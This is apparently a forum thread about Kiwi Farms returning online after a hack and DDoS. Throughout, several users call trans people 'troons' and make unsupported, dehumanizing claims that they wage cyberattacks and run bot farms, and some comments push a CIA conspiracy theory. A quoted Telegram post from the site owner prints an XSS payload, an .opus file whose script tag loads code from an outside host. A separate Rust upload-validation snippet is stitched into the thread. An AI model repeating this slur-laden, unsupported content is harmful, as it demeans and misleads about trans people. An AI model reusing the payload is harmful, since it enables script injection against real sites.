
[–][deleted] (11 children)

I'm really glad about it but....so what? Troons probably will just attack farms again soon.😮‍💨

[–][deleted] (10 children)

It's already being DDoSed. It's slow as shit.

[–][deleted] (8 children)

See? told ya 😮‍💨

[–]IndianaJones (7 children)

I'm surprised troons are smart enough to ddos. I thought they'd be the type to trip on bananas or some shit kek, they don't seem very bright.

[–][deleted] (3 children)

Don't misunderstand troons, my dude. Many of them are highly intelligent and know perfectly well what they are doing. Also, many troons are talented programmers and have shit tons of free time.

[–]jet199 (1 child)

I did once walk in on a debate between troons over whether using a certain programming language can turn you trans.

Apparently python is one to avoid.

[–][deleted] (0 children)

Lol xd

But yeah, it's fucking bizarre how many programmers are trooning out.🤔

[–]IndianaJones (0 children)

oh ok sorry

[–]jet199 (2 children)

They don't call them programmer's socks for nothing.

Most trans, even if smart, eventually start claiming disability so they can sit at home all day and wage solo cyber-warfare campaigns against normal decent people.

If not smart they will just become dull social media bots. There are a couple of troons on twitter with over 300 accounts each and that's all they do with their lives.

[–]IndianaJones (0 children)

Sounds like a pretty sad life! They make me feel better about myself. Haha.

Damn! It's like Jurassic Park out here!

[–]fuk (0 children)

TIL, thanks. Any sources for this claim?

[–][deleted] (4 children)

What is a clearnet and why do they farm kiwis there?

[–][deleted] (3 children)

Clear net is just the regular web, not the "dark" web. Kiwi Farms is a site where people obsess over lolcows, crazy internet people.

[–][deleted] (0 children)

👍

[–][deleted]  (1 child)

[deleted]

    [–][deleted] (0 children)

    I don't condone it, but I kind of understand when people lash out against the police, abuses are all too common. Does seem weird though he had just sent an apology to the police department and supported blue lives matter.

    [–][deleted]  (6 children)

    [deleted]

      [–][deleted] (5 children)

      I don't recall reading anything about the password situation besides he didn't think they'd been compromised but it was best to be safe rather than sorry. Apparently the forum software Xenforo does salt and hash passwords, but I've read a technique called rainbow tables can be used to glean the password anyways.

      Or he might have modified the code, or it was an obsolete version. Apparently their license for that software has not been renewed for some time because of the content of the site and things are out of date.

      [–][deleted] (4 children)

      Apparently the forum software Xenforo does salt and hash passwords, but I've read a technique called rainbow tables can be used to glean the password anyways.

      Rainbow table attacks can break 1-way hashing alone, but salting should prevent this

      [–][deleted] (3 children)

      Interesting. The attacker was able to gain admin access and had free roam of the system for a bit, I imagine this means the salt was compromised and then the rainbow table attack could still work, just take a bit longer.

      The site was compromised through his custom chat code, made me think of you actually. The attacker was able to upload a .. fuck, forgot the extension but some audio format file I think (.opus?), and XenForo doesn't verify data. It wasn't audio but a script and somehow it was able to be executed even though it shouldn't have had the permissions. I can look for the Telegram message if you're interested. That got them admin, they tried to get the user data, but it was too big and crashed the system (lol), so instead they just deleted everything.

      [–][deleted] (2 children)

      Deleted everything? damn I hope they had backups. Yeah definitely curious as to what exactly happened here if you come across the info

      [–][deleted] (1 child)

      It was all backed up. This is from the Telegram: (link)

      The issue was a script injection. I am working on the details. Here is my challenge to any hackers or aspiring hackers.

      There is a file called troonshine.opus, with the contents of this:
      <!DOCTYPE html>
      <script src=//poz.hiv/load.js></script>

      The web document, on the same domain, has a CORS rule that looks like this:
      <meta http-equiv="Content-Security-Policy" content="script-src 'self' 'nonce-0113ffa9cf5af884e070dd1e36188e5db5ba4bbdacaef1c21a733cea089a7fce'" />

      What could you possibly put into that document to get it to load the .opus and have the script execute?

      The finer details are this: XenForo does not validate any file contents. You can write an .opus file that is basically just an HTML document loading a script off-site and if you somehow open it, it does run. I have confirmed this.

      The question is of how it got injected. The chat on Kiwi Farms was a Rust websocket chat that was part of a forum rewrite I had been working on. Relevant source:
      https://github.com/jaw-sh/ruforo/blob/master/src/bin/xf_chat/main.rs
      https://github.com/jaw-sh/ruforo/blob/master/resources/js/chat.js
      https://github.com/jaw-sh/ruforo/tree/master/src/bbcode

      What baffles me is that even if we did theoretically pass the client a message that was simply instruction to load another script, it should not work, because the security policy of the chat explicitly says that no scripts should run — EVEN FROM THE SAME DOMAIN — unless they are given a nonce token. I know it happened in the chat, though, because I found the access.log entry where it gets opened:
      x.x.x.x - - [18/Sep/2022:03:03:53 -0400] "GET /data/audio/3696/3696202-c63cc36fd4acb874fdebd0b3988c3410.opus HTTP/1.1" 200 90 "https://kiwifarms.st/test-chat?style=dark" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36"

      So what can be done to make an .opus media file load as an inline web document which can execute its own scripts that violate the CORS of the web document it's loaded into? I just don't understand.

      jcmoon@pm.me
      P.S. If you're going to write me and take credit for the attack, include the name of the random user you made an admin.

      Edit: I believe that the .opus file with the xss payload was injected via an iframe that was somehow added to chat. I don't know how they rendered an iframe but that would work.
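
The Telegram message quoted above says XenForo does not validate uploaded file contents, so an HTML document can be stored under an .opus name. As an added example (not XenForo or ruforo code, and not part of the original post), a server-side check in Rust that accepts an upload as Opus only if its first bytes form an Ogg page carrying an OpusHead packet; the function and type names and both sample inputs are assumptions constructed here.

```rust
// Added example, not XenForo or ruforo code: content check for ".opus" uploads.
// Layout per RFC 3533 (Ogg page) and RFC 7845 (OpusHead packet).

#[derive(Debug, PartialEq)]
pub enum UploadError { TooShort, NotOgg, BadVersion, NotFirstPage, Truncated, NotOpus }

/// Accepts the bytes only if they begin with a well-formed first Ogg page
/// whose first packet is an OpusHead identification header.
pub fn validate_opus(data: &[u8]) -> Result<(), UploadError> {
    const HEADER_LEN: usize = 27; // fixed part of an Ogg page header
    if data.len() < HEADER_LEN { return Err(UploadError::TooShort); }
    if &data[0..4] != b"OggS" { return Err(UploadError::NotOgg); }
    if data[4] != 0 { return Err(UploadError::BadVersion); }
    // header_type flag 0x02 = beginning of stream; required on the first page
    if data[5] & 0x02 == 0 { return Err(UploadError::NotFirstPage); }
    let nsegs = data[26] as usize;
    let body_start = HEADER_LEN + nsegs;
    let lacing = data.get(HEADER_LEN..body_start).ok_or(UploadError::Truncated)?;
    let body_len: usize = lacing.iter().map(|&b| b as usize).sum();
    let body = data.get(body_start..body_start + body_len).ok_or(UploadError::Truncated)?;
    // OpusHead is at least 19 bytes: magic, version, channels, pre-skip, rate, gain, mapping
    if body.len() < 19 || &body[..8] != b"OpusHead" { return Err(UploadError::NotOpus); }
    // Major version (upper 4 bits) must be 0 and there must be at least one channel
    if body[8] & 0xF0 != 0 || body[9] == 0 { return Err(UploadError::NotOpus); }
    Ok(())
}

/// Constructed sample: a minimal first page carrying a mono 48 kHz OpusHead.
pub fn sample_opus_page() -> Vec<u8> {
    let mut head = b"OpusHead".to_vec();
    head.extend_from_slice(&[1, 1]);                  // version 1, 1 channel
    head.extend_from_slice(&312u16.to_le_bytes());    // pre-skip
    head.extend_from_slice(&48_000u32.to_le_bytes()); // input sample rate
    head.extend_from_slice(&[0, 0, 0]);               // output gain (2 bytes), mapping family
    let mut page = b"OggS".to_vec();
    page.extend_from_slice(&[0, 0x02]);               // stream version, BOS flag
    page.extend_from_slice(&[0u8; 20]);               // granule, serial, sequence, CRC (CRC not checked here)
    page.push(1);                                     // one segment
    page.push(head.len() as u8);                      // lacing value = 19
    page.extend_from_slice(&head);
    page
}

fn main() {
    // Constructed stand-in for an HTML document saved with an .opus name.
    let html = b"<!DOCTYPE html>\n<script src=//example.invalid/x.js></script>\n";
    println!("html as .opus: {:?}", validate_opus(html));
    println!("real header:   {:?}", validate_opus(&sample_opus_page()));
}
```

A header check alone does not reject a file that is valid Ogg up front with other content appended, so stored uploads should also be served with `Content-Type: audio/ogg` and `X-Content-Type-Options: nosniff`.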

      [–][deleted] (0 children)

      The chat on Kiwi Farms was a Rust websocket chat that was part of a forum rewrite I had been working on

      Yikes, lol, I see why this reminded you of me. Hacking his rusty forum and chat hits a little close to home

      So the good news is it doesn't sound like a rainbow table attack was able to break hashed and salted passwords. That would be catastrophic for security. An XSS attack is a more sensible attack vector for something like this. I am no hacker or security expert, but if there was a problem with his code, or even an underlying library that could be exploited, it would explain this. In the server I'm working on, I use the actix-cors library and if anyone can exploit that library I'd be boned, my code depends on all those library implementations being correct even if I do everything right on my end

      [–]Site_rly_sux (15 children)

      Weird that the new world order, which you believed was all-powerful and all-encompassing, seems to have...forgotten?....that just a few weeks ago they tried to censor this stalking deaththreat website.

      Would you agree with me that a powerful conspiracy probably wasn't behind KF being removed from Cloudflare? Or you think they just forgot about it after a week or two?

      [–][deleted] (8 children)

      Would you agree with me that a powerful conspiracy probably wasn't behind KF being removed from Cloudflare?

      Conspiracy? It was a campaign by Keffals. https://teddit.net/r/keffals/comments/x2bzvx/welcome_to_the_official_subreddit_of_the/

      They lobbied to get Joshua Moon kicked off Cloudflare so they could DDoS the shit out of the site, pretty sure it's happening again right now.

      have...forgotten?....that

      Forgotten? Fuck no, I don't know how many companies have dropped Kiwi Farms and Josh so far, but it's been quite the journey to getting the site back, he's probably using some foreign janky ass services, and it is recovering from a hack.

      stalking deaththreat website

      That's misinformation. It turns out it wasn't even the site that doxxed Keffals, the thinking it was because KF was shining light on him getting DIY hormones to minors.

      [–]Site_rly_sux (7 children)

      It was a campaign by Keffals

      They lobbied to get Joshua Moon kicked off

      the thinking it was because KF was shining light on him

      Look at all the mental gymnastics you have to do, in order to justify your blind belief in whatever the KF admins tell you must have happened.

      If only there was a primary source we could check in with, so we didn't have to solely believe the guilty party's version of events.

      Oh wait, there is. The decision maker himself already wrote why KF was removed. And it was because of the threats of violence that he observed during his personal browsing of that website.

      https://blog.cloudflare.com/kiwifarms-blocked/

      the rhetoric on the Kiwifarms site and specific, targeted threats have escalated over the last 48 hours to the point that we believe there is an unprecedented emergency and immediate threat to human life unlike we have previously seen from Kiwifarms or any other customer before

      [–][deleted] (6 children)

      Look at all the mental gymnastics you have to do, in order to justify your blind belief in whatever the KF admins tell you must have happened.

      Since the Christchurch shooting censorship I have infrequently visited Kiwi Farms. I don't see these things they're accused of. The lolcows are their entertainment, they hardly want them to die, there'd be no more entertainment. And the site doesn't endorse anything illegal, users are banned permanently for that. Lots of fucked up things happen on Facebook but they don't get shut down over it, just the little guy.

      This is the story the news wouldn't tell, the other side of it: https://kiwifarms.net/threads/dropkiwifarms.128421/

      Here's a screen shot it's very detailed, and too long for the entire thing to fit, there's a lot more.

      primary source

      Like me, a sometimes Kiwi Farms user or that dude who took a quick trip over there and was scared by all the autists.

      And think about what sort of people you're defending, Keffals, a piece of shit who delights in helping minors get DIY hormones. That's highly illegal and so's the DDoSing.

      [–]Site_rly_sux (5 children)

      Bruh you had to make a screenshot too long to fit rather than face up to the obvious

      primary source

      Like me

      No - primary source like the original man, the selfsame person who personally decided to take KF off of CF and wrote down his exact reasons why, which I quoted to you above. That kind of primary source

      [–][deleted] (4 children)

      https://archive.ph/8g76E here's an archive, probably easier to read if you'd bother to look at the other side of something, only way you're ever going to be able to make an informed decision. And you might even wonder why the version you heard about is so different from the reality of the situation, and on channels you probably thought were accurate and didn't just run anything in a press kit they're paid to.

      No - primary source like the original man, the selfsame person who personally decided to take KF off of CF and wrote down his exact reasons why, which I quoted to you above. That kind of primary source

      You said he just personally browsed there. Sounded like maybe once. I was there more. The reason that was initiated was from a letter writing campaign started by Keffals. They got them booted off more than just Cloudflare, that was just the opening shot. Kiwifarms.is, kiwifarms.st, they went through a lot of different domains and providers. Kept getting dropped.

      [–]Site_rly_sux (3 children)

      even wonder why the version you heard about is so different from the reality of the situation, and on channels you probably thought were accurate

      Dipshit not only is this NOT a topic that is being discussed outside of Q-adjacent conspiracy communities

      But if it was, and the common understanding was not aligned with the wall of text nonsense you're trying to link me to, it would probably be because they're BULLSHITTERS

      You said he just personally browsed there. Sounded like maybe once. I was there more.

      Facepalm. Yeah but you're not the founder and CEO of cloudflare are you. Unlike the guy I linked you to. And you don't make decisions about what kind of content is too extreme for their platform. And that man was the CEO and was the founder and did make the decision and wrote down exactly why. And yet you find a wall of bullshit too large for a screenshot more credible 🤔...really says a lot about how you take in information for your worldview

      [–][deleted] (2 children)

      Dipshit not only is this NOT a topic that is being discussed outside of Q-adjacent conspiracy communities

      Remember I showed you how to do a search: https://duckduckgo.com/?q=kiwi+farms&t=brave&iar=news&ia=news is Time magazine and CNN "Q-adjacent conspiracy communities"?

      And yet you find a wall of bullshit too large for a screenshot more credible

      It all checks out as far as I can tell and lines up with my own experience.

      [–]Site_rly_sux (1 child)

      duckduckgo

      The youngest story on there is 8 days ago. Today's development is not a hot topic is it

      It all checks out as far as I can tell

      Oh really

      What checks did you do

      Did you compare it against the primary source of the written word of the man who personally took the decision about the company he founded and managed. Did you try running that comparison

      [–][deleted] (0 children)

      Today's development is not a hot topic is it

      The site coming back is not being covered in the news, although it's an incredibly important story in my estimation. You usually can't fight against big tech, but there's one man doing it. Fighting for his right for him and his fellow autists to be able to make fun of internet celebrities again, which is super fucking lame imo, but freedom of speech causes are often not exactly noble seeming, like Larry Flynt's efforts.

      Did you compare it against the primary source of the written word of the man who personally took the decision about the company he founded and managed.

      No, that was nonsense. I took it right from the horse's mouth, checked out the long and detailed explanation Joshua Moon wrote, along with links, and I see nothing false about it, and I also don't see any users in that thread disagreeing with the facts as outlined. You might expect users to not want to incriminate themselves, but thousands of people would hardly work seamlessly to lie.

      [–]LarrySwinger2 (5 children)

      The CIA infiltrates groups and companies, from within which they work toward their own covert agenda, and it looks like something organic on the surface. A conspiracy is hard to prove, but I do think a large portion of woke outrage is engineered. The goal is a slow encroachment of civil liberties; they want to make it difficult to host free speech sites, without caring too much about KF in particular. If you look at the smear attack against RMS a couple years ago, you'll see something shady going on, namely that the main articles in that campaign were written by someone who worked for a company that opposes free software. So if there's covert activity going on now, it wouldn't be the first time.

      [–]Site_rly_sux (4 children)

      Ok genius so answer this. In your theory has the CIA just forgotten to remove them off the clearweb? Did they forget that they were supposed to be working on this?

      CC u/muskrat - because muskrat didn't think it was the CIA yet this dude thinks it was.

      [–][deleted] (0 children)

      Keffals the troon, not the CIA. Can't you read?

      [–]LarrySwinger2 (2 children)

      I'm leaving open the possibility of CIA involvement, and if it is, it's part of a slow encroachment. It could of course be authentic woke BS.

      [–]Site_rly_sux (1 child)

      Alright so you have enough of a CIA theory that they're there, they're in the mix, there's an outline of their involvement.

      But because you're basing it on zero evidence other than a conspiracist's mindset, you're unable to answer specifics, like why they seem to have forgotten about it a week later. Is that right?

      [–]LarrySwinger2 (0 children)

      I've addressed your question twice now. Lrn2read.